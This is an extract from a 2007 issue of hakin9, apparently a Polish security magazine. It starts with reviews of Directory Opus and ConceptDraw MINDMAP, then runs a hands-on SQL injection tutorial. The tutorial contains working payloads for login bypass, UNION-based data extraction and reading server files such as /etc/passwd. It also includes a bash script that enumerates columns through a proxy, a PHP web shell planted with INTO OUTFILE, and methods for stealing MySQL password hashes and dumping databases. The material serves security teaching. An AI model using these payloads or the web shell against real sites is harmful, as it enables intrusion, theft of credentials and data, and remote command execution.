plików w zależności od ich zawartości (możemy także definiować własne style). Zakładki niczym się nie różnią od tych znanych z przeglądarek, jednakże możemy zapisać układ wszystkich zakładek w folderze ulubionych i jednym kliknięciem przywracać stan DOpus a. Nie zabrakło obsługi protokołu FTP czy skompresowanych plików. Bardzo przydatnym dodatkiem jest możliwość wysyłania zdjęć do serwisu Flickr przy użyciu menu kontekstowego opublikujemy nasze ulubione zdjęcia bez korzystania z przeglądarki. Niestety, jedynym mankamentem DOpus a są skróty klawiaturowe. Jest ich bardzo dużo i trzeba się do nich przyzwyczaić, jednak bez większych problemów udało mi się je zmienić na te znane z TC. Doszliśmy do kolejnego etapu konfiguracji. Ustawienia trzeba liczyć w setkach (co jest zaletą). Autorzy programu postanowili zamieścić wyszukiwarkę do poruszania się po ustawieniach. Ich modyfikowanie możemy zacząć od dźwięków, przez udostępnianie, aż po integrację z systemem. Po kilku dniach pracy z programem skorzystałem z tej ostatniej możliwości i do teraz używam DOpus a jako zamiennika Eksploratora Microsoftu. Integracja jest bezproblemowa tj. działają menu kontekstowe, wszystkie foldery systemowe (Mój komputer, Panel sterowania, itp.), dodana jest także możliwość uruchamiania przez podwójne kliknięcie w dowolnym miejscu Pulpitu. Średnie zużycie pamięci przez DOpus a wynosi ok. 40 MB, ale w dzisiejszych czasach jest to rozsądna wielkość, zważywszy na możliwości, jakimi dysponuje program. Uruchamia się bardzo szybko (włącza się razem z systemem i rezyduje w pamięci), a użytkownik nie odczuwa przy tym żadnego dyskomfortu. Nie można w nim odnaleźć wad Windowsowego menadżera plików DOpus nie zawiesza się, nawet przy przeglądaniu folderów z dużą ilością zdjęć z miniaturkami. Directory Opus jest programem posiadającym same zalety i niemal nieograniczone możliwości, co czyni go niezwykle przydatnym. Pomimo, że jest to program komercyjny (po przeliczeniu kosztuje około 200zł), wart jest swojej ceny i mogę go polecić każdemu użytkownikowi systemów korporacji z Redmond. Amadeusz Jasak Rysunek 1. Zrzut ekranu oprogramowania Opus9 Rysunek 2. Interface menadżera plików Opus9 12 hakin9 Nr 10/2007

13 Narzędzia ConceptDraw MINDMAP 5 Professional Producent: Computer Systems Odessa System: Windows XP Typ: Mind Mapping Strona producenta: Strona dystrybutora: Ocena: 4/5 Każdy, kto rozpoczyna działalność gospodarczą, potrzebuje biznes planu, który określi opłacalność przedsięwzięcia. Najprostszym na to sposobem jest zbudowanie mapy myśli wykresu dokładnie obrazującego wszystkie pomysły. I tu przychodzi nam z pomocą program MINDMAP, który świetnie się do tego celu nadaje. MINDMAP 5 Professional to aplikacja pozwalająca na przygotowywanie prezentacji graficznych, które są pomocne przy tworzeniu różnego rodzaju projektów. Jej zaletą jest również to, że może zobrazować strukturę firmy, a nawet zadania, które mamy zamiar wykonać. Program pomaga również w rozwiązywaniu różnego rodzaju problemów czy też... tworzeniu drzewa genealogicznego. Program jest idealny do przedstawiania zarówno prostych, jak i profesjonalnych materiałów edukacyjnych. Pasek narzędzi pozwala na zmianę struktury mapy myśli oraz na dodawanie, usuwanie i edytowanie poszczególnych jej części. Istnieje także możliwość używania symboli, które pomagają w określeniu tematów, jak również w ich zapamiętaniu. Do programu można importować obrazki oraz wklejać cliparty. Tworząc nowy temat można dodać do niego komentarz, notatkę, a nawet hiperłącze. Jest też wiele możliwości formatowania tekstu oraz obrazków, poczynając od zmiany czcionki aż po zaawansowane metody graficzne. W porządkowaniu tego wszystkiego pomaga nam drzewo, ukazujące całą strukturę mapy. Boczny pasek pokazuje wszystkie strony w dokumencie, co jest wręcz niezbędne przy edycji rozbudowanych map.. Bardzo przydatną funkcją jest możliwość ukrywania gałęzi Rysunek 3. Zrzut ekranu programu MINDMAP 5 Professional mapy pozwala to zaprezentować główną ideę dokumentu oraz jego poszczególne podtematy. Jedną z zalet programu jest to, że choć dostępny w wersji angielskiej, to obsługuje polskie znaki diakrytyczne. Gdy nasza mapa nie mieści się na jednej stronie, istnieje możliwość rozbicia jej na dwie lub więcej kart. Kolejną ciekawą funkcją programu jest burza mózgów pozwala ona tworzyć pomysły i dyskutować o nich w grupie osób. Wystarczy zapisać swoje myśli, a program przekształci je w mapę myśli, którą możemy edytować, rozwijać i organizować. Pomiędzy poszczególnymi myślami tworzymy relacje, a następnie je formatujemy. Burzę mózgów można ograniczyć czasowo, ustawiając odpowiednią wartość we właściwościach mapy. Aby urozmaicić naszą mapę myśli, można dodawać figury geometryczne, linie proste i krzywe oraz cliparty. Profesjonalna baza clipartów, która zawiera ich aż 100, sprawia, że tworzenie mapy myśli staje się bardziej atrakcyjne, a sam efekt łatwiejszy w odbiorze. Całą naszą pracę można zapisać w postaci projektu, który zajmuje niewiele miejsca na dysku, a następnie wydrukować. I tu pojawia się problem, ponieważ podczas próby zapisu widzimy komunikat informujący o błędnym działaniu programu na szczęście projekt zostaje mimo to zapisany. Kolejnym problemem jest fakt, że zapisanego projektu... nie da się otworzyć, co znacznie utrudnia pracę z programem. Producent na swoim forum zapewnia jednak, że błąd pojawiający się w wersji 5.0 jest wyeliminowany w wersji Program MINDMAP 5 pomaga stworzyć prezentację bardziej efektywną oraz przedstawić ją w bardziej interesujący sposób niż MS PowerPoint. Po zakończeniu pracy projekt możemy eksportować do prezentacji PowerPointa, pliku graficznego, a nawet strony internetowej. MINDMAP 5 Professional zaskakuje swoimi możliwościami oraz wbudowanymi narzędziami. Program wart jest swojej ceny, choć nie każdego będzie na niego stać. Uważam, że nadaje się on bardziej dla firm niż do zastosowań domowych, ale na pewno pomoże przy nauce nudnych tematów. Ciekawostką jest to, że program poza systemem Windows działa również na platformie Mac. Po instalacji zajmuje niewiele miejsca na dysku (50MB). Niestety nie ma polskiej wersji językowej. Pomoc programu jest bardzo dobra porusza wszystkie problemy związane z tworzeniem mapy, wadą jest jedynie język angielski. Biorąc pod uwagę jego możliwości i cenę, program jest wart uwagi. Paweł Malinowski hakin9 Nr 10/

14 Ataki SQL Injection w praktyce Początki Dawid Gołuński stopień trudności Bazy danych są dziś nieodłączną częścią nowoczesnych aplikacji internetowych, takich jak sklepy internetowe czy serwisy aukcyjne. Język SQL, używany do komunikacji z bazą, choć oferuje wiele możliwości, stwarza też pewne zagrożenia. Wystarczy moment nieuwagi, aby pozostawione bez kontroli zapytanie posłużyło do przejęcia wrażliwych danych. Zacznijmy od utworzenia przykładowej tabeli o nazwie wwwusers, zawierającej następujące pola: id, name, login, pass. W tym celu skorzystamy z narzędzia mysql monitor, które doskonale nadaje się do testowania wszelkich zapytań i wyłapywania błędów. Proces tworzenia tabeli został przedstawiony na Listingu 1. Następnie, zgodnie z Listingiem 2. tworzymy prostą stronę internetową uwierzytelniającą użytkowników na podstawie haseł znajdujących się w bazie danych. Podatność na ataki źródło problemu Przedstawiony skrypt PHP używa zapytania SELECT do wybrania rekordu zawierającego podany login i hasło. Jeśli serwer w odpowiedzi zwróci przynajmniej jeden rekord, użytkownik zostanie zalogowany. Teoretycznie, zalogowanie bez znajomości hasła jest niemożliwe. Niestety, skrypt zawiera bardzo istotną lukę dane pobierane od użytkownika nie są w żaden sposób filtrowane. Stanowią one część dynamicznie utworzonego zapytania, przekazywanego do bazy. Oznacza to, że osoba odwiedzająca stronę ma bezpośredni wpływ na końcową formę zapytania! Brak lub niedostateczne filtrowanie danych pobranych od użytkownika może umożliwić wstrzyknięcie dodatkowego kodu SQL do podstawowego zapytania. Stąd nazwa ataku SQL Injection. Zalogowanie bez znajomości hasła Wyobraźmy sobie sytuację, w której ktoś wprowadzi w polu Username wartość dave'-- _ (ostatni znak to spacja), natomiast w polu Password dowolny ciąg znaków, np. nieznane. Skrypt po podstawieniu wartości obu pól utworzy takie oto zapytanie: Z artykułu dowiesz się czym są, jakie niosą zagrożenia oraz na czym polegają ataki SQL Injection, poznasz techniki używane podczas ataku, poznasz podstawowe metody obrony. Co powinieneś wiedzieć powinieneś znać podstawy języka SQL, powinieneś znać podstawy administracji systemem Linux oraz serwerem MySQL, powinieneś znać podstawy PHP, C oraz basha. 14 hakin9 Nr 10/2007

15 Ataki SQL Injection w praktyce SELECT * FROM wwwusers WHERE login='dave'-- ' AND pass='nieznane' Uwierzytelnienie przebiegnie dokładnie tak samo, jak w przypadku podania poprawnego hasła. Dzieje się tak dlatego, że dwa myślniki oznaczają w Listing 1. Budowa tabeli wwwusers składni SQL komentarz, co sprawia, że dalsza część zapytania zostaje kompletnie zignorowana przez serwer. Otrzymujemy więc zapytanie: SELECT * FROM wwwusers WHERE login='dave' które zwróci wiersz zawierający wyraz dave w polu login. Zalogowanie bez loginu oraz hasła Podając w pierwszym polu ciąg nobody' OR 1=1--, a w drugim podobnie jak poprzednio dowolny wyraz, otrzymamy zapytanie: mysql> CREATE TABLE wwwusers >(id int, name char(25), login char(25), pass char(25)); mysql> INSERT INTO wwwusers > VALUES('1', 'Dave', 'dave', 'secretdbpass'); mysql> INSERT INTO wwwusers > VALUES('2', 'John', 'john_usr', 'johnpassword'); mysql> INSERT INTO wwwusers > VALUES('3', 'Paul','admin','pass-www'); mysql> SELECT * FROM wwwusers; id name login pass Dave dave secretdbpass 2 John john_usr johnpassword 3 Paul admin admin-www rows in set (0.00 sec) Listing 2. Strona login.php <HTML> <BODY> <FORM name="log_form" method="post"> Username: <INPUT type="edit" name="user"> Password: <INPUT type="edit" name="pass"> <INPUT type="submit" value="log in"> </FORM> <?php if ( isset($_post['user']) && isset($_post['pass']) ){ $user = $_POST['user']; $pass = $_POST['pass']; } else die("nie przeslano danych"); $conn = mysql_connect("localhost","user","pass") or die("brak polaczenia z baza"); mysql_select_db("baza_danych") or die("nie ma takiej bazy"); /* Utworzenie zapytania w oparciu o przekazane wartosci */ $query = "SELECT * FROM wwwusers WHERE login='$user' AND pass='$pass'"; echo "<br>zapytanie wyslane do bazy:<br>". $query. "<br>"; /* Przeslanie zapytania do bazy */ $res = mysql_query($query); if (!$res) echo "<br>". mysql_error(). "<br>"; $record = mysql_fetch_row($res); /* Jesli serwer znalazl rekord to uzytkownik zostaje zalogowany*/ if ($record) { echo "<br>hello <b>$record[2]</b>! Oto twoje dane: <br><br>"; echo "<TABLE border=1><tr>"; echo "<td>id</td> <td>$record[0]</td></tr>"; echo "<tr><td>name</td> <td>$record[1]</td>"; echo "<tr><td>login</td> <td>$record[2]</td>"; echo "<tr><td>pass</td> <td>$record[3]</td></tr></table>"; } else echo "<br><b>podales zle haslo, lub login</b>";?> </BODY> </HTML> SELECT * FROM wwwusers WHERE login='nobody' OR 1=1 -- ' AND pass='nieznane' Co można przetłumaczyć jako pokaż wszystkie rekordy, w których pole login jest równe wyrazowi nobody albo 1=1. Drugie wyrażenie (1=1) jest zawsze prawdziwe dlatego mimo, że w bazie nie ma użytkownika nobody, dopasowane zostaną wszystkie rekordy zawarte w tabeli. W efekcie użytkownik zostanie zalogowany. Przechwycenie haseł Skrypt odczytuje jedynie pierwszy rekord zwrócony przez serwer. Dlatego stosując operator OR zobaczymy dane tylko pierwszego użytkownika. Aby zmusić skrypt do wyświetlenia kolejnych rekordów, zastosujemy kolejny operator LIMIT, którego wywołanie ma postać: LIMIT {[offset,] row_count} gdzie offset to przesunięcie określające, ile początkowych wierszy należy pominąć, a row _ count to ilość wierszy, którą chcemy otrzymać. Dodając do poprzedniego zapytania ciąg LIMIT 1,1 zostaniemy zalogowani jako kolejny, znajdujący się na drugim miejscu tabeli użytkownik john _ usr. Zwiększając dalej offset dojdziemy do hasła administratora. Ograniczenia Dotychczas wstrzykiwany kod stanowił jedynie parametry dla polecenia SELECT. Powstaje pytanie, czy istnieje szansa na wykonanie kolejnego niezależnego od pierwszego polecenia w ramach jednego zapytania? Do rozdzielania komend służy znak średnika. Po wprowadzeniu podczas logowania ciągu '; DROP TABLE wwwusers--, koń- hakin9 Nr 10/

16 Początki cowe zapytanie będzie wyglądało tak: SELECT * FROM wwwusers WHERE login='';drop TABLE wwwusers Zamiast spodziewanego efektu (skasowanie tabeli) otrzymamy jednak błąd: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';DROP Spowodowane jest to tym, że funkcja mysql _ query() nie pozwala wykonać dwóch rozłącznych zapytań w czasie jednego wywołania. Ogranicza to znacznie zakres ataku - nawet w przypadku całkowitego braku kontroli danych wejściowych. Mimo to, z pomocą operatora UNION, istnieje możliwość wykonania dodatkowych instrukcji SELECT. The used SELECT statements have a different number of columns Należy tu zauważyć, że pierwszy (zawarty w skrypcie PHP) SELECT wybiera wszystkie cztery pola (symbol *) tabeli wwwusers, natomiast drugi tylko dwa. Problem można rozwiązać poprzez wstawienie dowolnych wartości liczbowych w miejsce brakujących pól. Po wstawieniu liczb 1 i 2 końcowe zapytanie będzie wyglądało tak: SELECT * FROM wwwusers WHERE login='nic' UNION SELECT 1, 2, name, number FROM contact Jest ono jak najbardziej poprawne i da w wyniku wszystkie rekordy tabeli contact. Wynik nie zawiera rekordów z tabeli wwwusers, ponieważ żaden z nich nie został dopasowany (login nic nie istnieje). Serwer SQL Aby klient mógł przeprowadzić jakąkolwiek operację na bazie danych, musi istnieć serwer SQL. Rolą serwera jest przyjmowanie zapytań od klientów, wykonywanie żądanych operacji na bazie oraz przedstawianie wyników. Serwer bazy danych zarządza również użytkownikami i uprawnieniami. Do bardziej znanych serwerów należą: MySQL, PostgreSQL, MsSQL, Oracle. W tym artykule skoncentrowano się głównie na serwerze MySQL, który jest jednym z najpopularniejszych ze względu na szybkość działania, otwartość kodu i przenośność. Wiele opisanych technik powinno znaleźć zastosowanie również w przypadku innych serwerów baz danych. odwiedzający stronę ma wpływ (może je modyfikować). Są to w szczególności: Pobieranie informacji z innych tabel Obok tabeli wwwusers tworzymy tabelę contact - zgodnie z Listingiem 4. Aby wydobyć z niej informacje, posłużymy się operatorem UNION. Wpisując w formularzu: nic' UNION SELECT name,number FROM contact-- otrzymamy błąd: Przebieg ataku na bazę danych Jeżeli atakujący nie posiada konta na serwerze, a wynik skanowania portów nie przyniósł rezultatów, kolejnym krokiem w przełamaniu zabezpieczeń serwera może być przeszukanie strony WWW pod kątem błędów PHP/SQL. Gdzie wstrzyknąć kod? Na atak narażone są wszelkie miejsca kontaktu użytkownik-skrypt, na które Rysunek 1. Wpływ danych wejściowych na końcowe zapytanie Rysunek 2. Oszukanie skryptu login.php przy pomocy operatora OR wszelkiego typu pola edycyjne, parametry przekazywane w adresie URL, ciasteczka (cookies), ukryte pola formularzy, rozwijane listy wyboru, pola wyboru (checkbox, radio). W przypadku słabo zabezpieczonych stron internetowych zwykle udaje się odnaleźć niefiltrowaną zmienną wśród parametrów adresu URL. Mając do czynienia z lepiej zabezpieczonymi witrynami, warto sprawdzić mniej oczywiste miejsca, jak np. listy wyboru. Programiści często mylnie zakładają tu, że użytkownik posiada wybór ograniczony jedynie do elementów rozwijanej listy. Nic nie stoi przecież na przeszkodzie, aby stronę HTML zawierającą formularz z taką listą zapisać na dysku, a następnie zmodyfikować jedną z jej pozycji. Czasem poszukiwania, ze względu na dużą ilość potencjalnie niefiltrowanych miejsc, wymagają nawiązania sporej ilości połączeń z serwerem WWW. Takie próby zostają odnotowane w logach. Dlatego ataki przeprowadzane są zwykle przy użyciu serwerów pośredniczących (proxy). 16 hakin9 Nr 10/2007

17 Ataki SQL Injection w praktyce Serwer zwraca błąd W zależności od tego, gdzie trafi wstrzyknięty kod, komunikat błędu może informować o nieprawidłowej składni, nieistniejącej nazwie pola, błędnej wartości dla pola danego typu itp. Przypuśćmy, że zmieniając parametr c w adresie shop/index.php?pid=1&c=2 na c=abc2 serwer zwrócił błąd: Unknown column 'abc2' in 'where clause' W takim przypadku można domyślić się, że gdzieś w pliku index.php istnieje funkcja konstruująca zapytanie podobne do: SELECT * FROM produkty_tab WHERE c=$_get['c'] Odczytana z tablicy GET zmienna c nie jest ograniczona apostrofami, ponieważ programista nie przewidział wystąpienia w tym miejscu wartości innej niż liczbowa. Dlatego wstawienie ciągu znaków abc2 sprawia, że serwer próbuje odwołać się do tej wartości jak do nazwy pola, które jak wynika z komunikatu nie istnieje. Pierwszy zastrzyk Wiedząc, że zmienna c musi być liczbą i nie jest ograniczona apostrofami, można spróbować wykorzystać operator UNION w celu wstrzyknięcia dodatkowego polecenia. Przypisanie c=2 UNION SELECT 1-- utworzy zapytanie: Parę słów o UNION UNION jest operatorem pozwalającym scalić ze sobą wyniki dwóch lub większej ilości zapytań SELECT. Zrozumienie istoty jego działania jest niezmiernie ważne, gdyż stanowi podstawę większości ataków. Wstrzyknięty kod z reguły trafia na koniec zapytania dynamicznie utworzonego przez skrypt PHP. Atakujący nie ma możliwości zmiany zdefiniowanego na jego początku polecenia SQL, ani też dodania nowego po średniku. Jedyną możliwością ingerencji jest wtedy użycie UNION. Schemat wywołania tego operatora prezentuje się tak: SELECT... FROM... UNION SELECT... FROM... UNION... W odpowiedzi na tak skonstruowane zapytanie serwer najpierw wykona pierwsze polecenie SELECT, następnie drugie dostawiając jego wynik do rezultatu pierwszego polecenia itd. Każde z poleceń składowych może odwoływać się do różnych tabel, pól, a także posiadać dodatkowe warunki i parametry, niezależne od pozostałych. Istnieje tu jednak ograniczenie każdy SELECT musi wybierać identyczną liczbę pól. Ponadto odpowiadające sobie pola powinny być tego samego typu (w innym przypadku część serwerów odrzuci zapytanie). SELECT * FROM produkty_tab WHERE c=2 UNION SELECT 1-- Jeżeli skrypt nie dokona filtracji kodu, a tabela produkty _tab okaże się zawierać większą liczbę kolumn serwer zwróci błąd: The used SELECT statements have a different number of columns Liczba kolumn może zostać ustalona poprzez kolejne wstawianie cyfr po przecinkach, do momentu aż serwer nie wyświetli błędu: Listing 3. Prosty przykład użycia UNION /* Wynik pierwszego zapytania SELECT */ SELECT imie,nazwisko FROM tabela1 WHERE imie='jan' imie nazwisko Jan Kowalski /* Wynik drugiego zapytania SELECT */ SELECT miasto,kraj FROM tabela miasto kraj Poznan Polska Warszawa Polska /* Zestawienia ze sobą wyników obu zapytań SELECT */ SELECT imie,nazwisko FROM tabela1 WHERE imie='jan' UNION SELECT miasto,kraj FROM tabela imie nazwisko Jan Kowalski Poznan Polska Warszawa Polska c=2 UNION SELECT 1,2-- c=2 UNION SELECT 1,2, Niektóre tabele mogą zawierać dziesiątki kolumn, dlatego ustalenie właściwej liczby może zająć sporo czasu. Nasze zadanie może jednak zostać w pełni zautomatyzowane skryptem z Listingu 6. Po przesłaniu zapytania z właściwą liczbą kolumn na stronie powinny ukazać się wybrane cyfry. Jeżeli ich nie widać, atakowany skrypt najpewniej wyświetla tylko pierwszy rekord. Można temu zaradzić dodając operator LIMIT 0, który usunie wynik uzyskany z pierwszego polecenia SELECT. Where are we, czyli rekonesans Po nawiązaniu komunikacji z bazą można przystąpić do rozpoznawania środowiska, w jakim pracuje atakowany skrypt. Chcąc dowiedzieć się, na jakim koncie serwera SQL pracuje skrypt, wystarczy skorzystać z wbudowanej funk- hakin9 Nr 10/

18 Początki Listing 4. Budowa tabeli contact mysql> CREATE TABLE contact >(name char(25), number char(25); mysql> INSERT INTO contact VALUES('Mike', ' '); mysql> INSERT INTO contact VALUES('Tom', ' '); mysql> SELECT * FROM contact; name number Mike Tom rows in set (0.00 sec) Listing 5. Kod HTML listy wyboru <form name="locale" method="post" action="country.php"> <b>country/region:</b><br> <SELECT name="country" size="10"> <option value="afghanistan en-in">afghanistan</option> <option value="' UNION SELECT 1,2-- ">' UNION SELECT 1,2-- </option>... </SELECT> Listing 6. Skrypt num_of_cols.sh odgadujący liczbę kolumn #!/bin/bash # Skrypt probuje odgadnac liczbe kolumn tabeli poprzez wstawienie # ciagu: UNION SELECT 1-- w oznaczone (przez: _HERE_) miejsce adresu # URL i stopniowe zwiekszanie liczby wybieranych cyfr - do momentu az serwer # przestanie zwracac blad. Przed uruchomieniem trzeba ustawic zmienna PROXY # Uzycie:./script.sh [URL with _HERE_ keyword] [number_of_tries] # Przyklad: #./script.sh "http://sqlbug.com/show.php?var=1_here_&id=5&color=g" 30 SKIP=0; PROXY="x.x.x.x:80"; sql="%20union%20select%201--%20"; if [ $# -lt 1 ]; then echo "read ussage!"; exit 1; fi if [ $# -eq 2 ] then try_count=$2; echo -e"trying $try_count times\n" else try_count=40; fi; add_columns() { sql=`echo $sql sed 's/--%20//g'`; sql="${sql},$((i+1))--%20"; } for (( i=1; i<=$try_count; i++ )) do if [ $SKIP -ne 0 ]; then SKIP=$((SKIP-1)); add_columns; continue; fi; url=`echo $1 sed "s/_here_/$sql/"`; echo "($i) Trying URL: $url..."; if! curl -x "$PROXY" "$url" lynx --dump -stdin grep -A4 -B4 SQL grep -i different; then echo echo "I found it! The number of columns is $i" echo -e "The correct URL is: \n$url\n\n" exit 0 fi; add_columns; echo; done; cji user(), która zwróci potrzebne informacje (w postaci Aby rezultat funkcji był widoczny, jej wywołanie musi zostać umieszczone w miejscu jednej z cyfr, które ukazały się na stronie w trakcie ustalania liczby kolumn, np.: SELECT 1,user(),3,4,5,6,7,8-- W uzyskaniu pozostałych informacji pomocne mogą okazać się również zmienne systemowe. Przykładowo, aby dowiedzieć się, na jakim systemie pracuje baza, można wykorzystać zmienną version _ compile _ os, której wartość ustali zapytanie: SELECT Zagłębianie się w system Mając podstawowe informacje o koncie oraz systemie, możemy pokusić się o użycie funkcji load _ file() w celu odczytania plików konfiguracyjnych systemu. Oczywiście podany jako parametr plik musi posiadać uprawnienia zezwalające procesowi serwera bazy na odczyt. Przykładami plików, które często posiadają takie uprawnienia, a zarazem dostarczają istotnych informacji są: /etc/passwd, /etc/inittab, /etc/my.cnf, /etc/inetd.conf, httpd.conf, skrypty startowe rc, niektóre dzienniki serwera (w tym logi SQL). Poznanie dokładnej wersji systemu zazwyczaj ogranicza się do odczytania pliku o nazwie w rodzaju /etc/redhat-release. Taka informacja zdradza umiejscowienie innych plików konfiguracyjnych charakterystycznych dla danej dystrybucji systemu. Czytanie skryptów PHP Oprócz wspomnianych plików, często możliwy jest odczyt źródeł aplikacji PHP. Źródła strony mogą zawierać niezakodowane hasła do baz danych (przekazane do funkcji mysql _ connect()), jak również zdra- 18 hakin9 Nr 10/2007

19 Ataki SQL Injection w praktyce Jest szansa, że programista w celu zapewnienia poprawnej pracy skryptu nadał katalogowi mail uprawnienia o+w. W takim wypadku wystarczy napisać krótki skrypt PHP wykonujący komendy podane jako parametr $cmd: <?php $cmd = $_GET['cmd']; $out = system("$cmd");?> Rysunek 4. Skrypt num_of_cols.sh w akcji dzić inne trudne do wykrycia z zewnątrz rodzaje błędów. Po połączeniu informacji o położeniu katalogu domowego (plik passwd) z nazwą katalogu przechowującego strony (plik httpd.conf), możemy próbować odczytać pliki indeksowe: load_file('/home/user_name/html_dir/ index.php') Prawdopodobieństwo odczytania pliku jest stosunkowo duże, ponieważ część administratorów nadaje katalogowi html _ dir i jego plikom prawa o+rx. Odczytanie pliku indeksowego wystarczy, aby śledząc odwołania typu include() dotrzeć do nazw kolejnych plików skryptu. Warto tu również wspomnieć o funkcji hex(), która pozwoli skonwertować odczytany plik na postać szesnastkową. Przydaje się to zwłaszcza do odczytywania plików zawierających znaki niedrukowalne. Pozwala też zapobiec interpretacji kodu przez właściwy skrypt lub przeglądarkę. Pisanie do plików MySQL oferuje możliwość zapisu do wskazanego pliku poprzez parę operatorów polecenia SELECT: OUTFILE i DUMPFILE. Odbywa się to w taki oto sposób: SELECT * FROM tabela INTO OUTFILE '/sciezka/do/pliku' Ze względów bezpieczeństwa nadpisywanie plików jest zabronione, dlatego ścieżka musi wskazywać nieistniejący plik. Mimo to operatory te stanowią duże zagrożenie. Wystarczy wyobrazić sobie, że podczas przeglądania źródeł PHP natrafiliśmy na fragment: $file = fopen("mail/list1.txt","w"); fwrite($file,"$ \n"); Trzy zapytania do information_schema SELECT schema_name FROM information_schema.schemata, SELECT table _ name FROM information _ schema.tables WHERE table _ schema='wybrana _ baza', SELECT column _ name FROM information _ schema.columns WHERE table _ schema='wybrana _ baza' AND table _ name='wybrana _ tabela' uzyskamy odpowiednio: listę wszystkich dostępnych baz, kompletną listę tabel bazy wybrana_baza, oraz kompletną listę pól zawartych w bazie wybrana_baza. Posiadając te informacje możemy już kierować zapytania do konkretnych tabel. Taki skrypt po konwersji na postać szesnastkową może zostać zapisany na serwerze z pomocą operatora OUTFILE. Po pomyślnym wykonaniu zapytania przedstawionego na Listingu 7. uzyskamy możliwość wykonywania komend powłoki z uprawnieniami procesu serwera WWW: ~user1/mail/run.php?cmd=ps. Czytanie baz danych Podstawowy problem związany z wyciąganiem informacji z nieznanej bazy wiąże się z nieznajomością jej struktury. Zazwyczaj nie jesteśmy w stanie przewidzieć nazw baz, tabel czy kolumn. Czasem informacje te pojawiają się w generowanych przez serwer komunikatach o błędach, lecz są to tylko szczątkowe dane. Nowsze wersje serwera MySQL udostępniają specjalną bazę information _ schema, która znakomicie ułatwia pracę z nieznanymi danymi. W celu przyspieszenia operacji odczytu danych z bazy można wykorzystać funkcję concat(), która pozwala scalić wartości kilku pól w jeden ciąg znaków. Przykładowo, zapytanie: SELECT concat('[ ',imie,'=', nazwisko,'=', telefon,'=', mail,' ]') FROM sklepdb.zamowienia wyświetli zawartość czterech pól tabeli zamowienia, rozdzielone znakami równości. Kradzież haseł Serwer MySQL przechowuje informacje o użytkownikach w bazie danych o nazwie mysql. Baza ta zawiera dane potrzebne do autoryzacji użytkowników, a także określa przy- hakin9 Nr 10/

20 Początki Rysunek 5. Wyświetlenie wyniku funkcji user() na atakowanej stronie sługujące im przywileje. Kluczowa tabela w niej zawarta to user, która posiada m. in. następujące pola: user nazwa użytkownika, host host, z którego użytkownik ma prawo się łączyć, password zaszyfrowane hasło w postaci skrótu (hash). Domyślnie tylko użytkownik o loginie root ma do niej dostęp. Jednak zdarza się, że administrator definiując dostępne obiekty dla nowego użytkownika wpisuje po prostu *.* co oznacza wszystkie bazy i tabele, łącznie z mysql.user. Skróty haseł różnią się między sobą długością. Krótsze wynikają z zastosowania starszego mechanizmu generowania hashy używanego w wersjach serwera MySQL starszych niż 4.1. Takie hasła są bardzo podatne na atak siłowy (brute force). Czas siłowego złamania 7-znakowego hasła zawierającego różnej wielkości litery, cyfry czy nawet znaki specjalne, na przeciętnym komputerze nie przekracza zwykle 5 minut. Należy pamiętać, że rozkodowanie hasła nie gwarantuje uzyskania dostępu do bazy. O tym, czy dany użytkownik będzie mógł zalogować się na dane konto decyduje pole host. Jeśli jest ono puste lub zawiera znak %, oznacza to, że na konto można zalogować się z dowolnego miejsca. Czy jednak hasła kont zezwalających wyłącznie na dostęp z lokalnego adresu są zupełnie bezużyteczne? Bynajmniej istnieje przecież szansa, że użytkownik posiada również konto systemowe (z dostępem do powłoki) z identycznym hasłem. Posiadając hasło do konta, które zezwala na zdalny dostęp, możemy uzyskać bezpośrednie połączenie z bazą (poleceniem mysql). Nie będziemy już ograniczeni do polecenia UNION SELECT. Zyskamy możliwość wykonywania pozostałych komend SQL w granicach uprawnień przypisanych do konta. Jeśli konto ma nadane maksymalne uprawnienia z bazą można zrobić praktycznie wszystko. Zdalny dostęp do serwera pozwala też na wykonanie dokładnej kopii wybranej bazy na lokalnym dysku twardym. Służy do tego narzędzie mysqldump, wywołane w taki sposób: mysqldump -u admin -p'pass' \ -h host sklepdb >dump.sql Problemy, na jakie może napotkać atakujący Ataki SQL Injection rzadko kiedy przebiegają bezproblemowo. Trudności w określeniu miejsca pozwalającego na wstrzyknięcie kodu, filtrowanie danych Wbudowane funkcje serwera MySQL wejściowych pod kątem znaków specjalnych czy brak wyświetlania wyników na stronie WWW to tylko część problemów mogących wystąpić podczas ataku. Wystarczająco zdeterminowany napastnik jest jednak w stanie przezwyciężyć niektóre z nich. Magiczne apostrofy Jeśli w konfiguracji PHP aktywowana zostanie opcja magic _ quotes _ gpc, to wszystkie dane pochodzące z zewnątrz (przekazane za pomocą metod GET, POST czy też ciasteczek) zostaną automatycznie zabezpieczone. Jeśli zmienna zawiera znaki:, ' czy \, to przed każdym z nich dopisany zostanie znak odwrotnego ukośnika (\) likwidując w ten sposób specjalne znaczenie każdego z wspomnianych znaków. Zakładając, że omawiana opcja jest aktywna, a w kodzie PHP znajduje się linijka: MySQL oferuje pokaźny zestaw wbudowanych funkcji, które pozwalają na wykonanie określonych czynności po stronie serwera. Stanowią one nieocenioną pomoc dla napastnika. Funkcje najczęściej używane w atakach SQL Injection to: load_file() odczytuje wskazany plik, user() zwraca nazwę aktualnie zalogowanego użytkownika, database() zwraca nazwę aktualnie używanej bazy, sleep() wstrzymuje pracę skryptu na określoną ilość sekund, hex(), unhex() konwersja liczb szesnastkowych, char() zamiana liczby na znak (w kodzie ASCII), concat() połączenie ze sobą ciągów znaków, if() tworzenie warunku, ascii() zwraca kod ASCII podanego znaku, count() zlicza otrzymane rekordy. Zmienne systemowe serwera MySQL Serwer MySQL przechowuje w pamięci dużą ilość zmiennych, które zawierają kluczowe informacje na temat konfiguracji bazy danych, a także o systemie operacyjnym. Zmienne, które mogą okazać się szczególnie przydatne podczas rekonesansu to: basedir katalog bazowy, datadir katalog przechowujący pliki baz danych, initfile ścieżka do pliku z poleceniami SQL, które zostaną wykonane podczas startu serwera, port numer portu na którym działa daemon MySQL, version wersja serwera, version _ compile _ machine architektura atakowanej maszyny, version _ compile _ os rodzaj systemu operacyjnego. Pełną listę zmiennych wraz z ich wartościami uzyskamy wydając polecenie: show variables, w programie mysql monitor. 20 hakin9 Nr 10/2007

Aplikacje webowe w obliczu ataków internetowych na przykładzie CodeIgniter Framework

Aplikacje webowe w obliczu ataków internetowych na przykładzie CodeIgniter Framework Uniwersytet Zielonogórski Wydział Elektrotechniki, Informatyki i Telekomunikacji Aplikacje webowe w obliczu ataków internetowych na przykładzie CodeIgniter Framework mgr inż. Łukasz Stefanowicz dr inż.

Bardziej szczegółowo

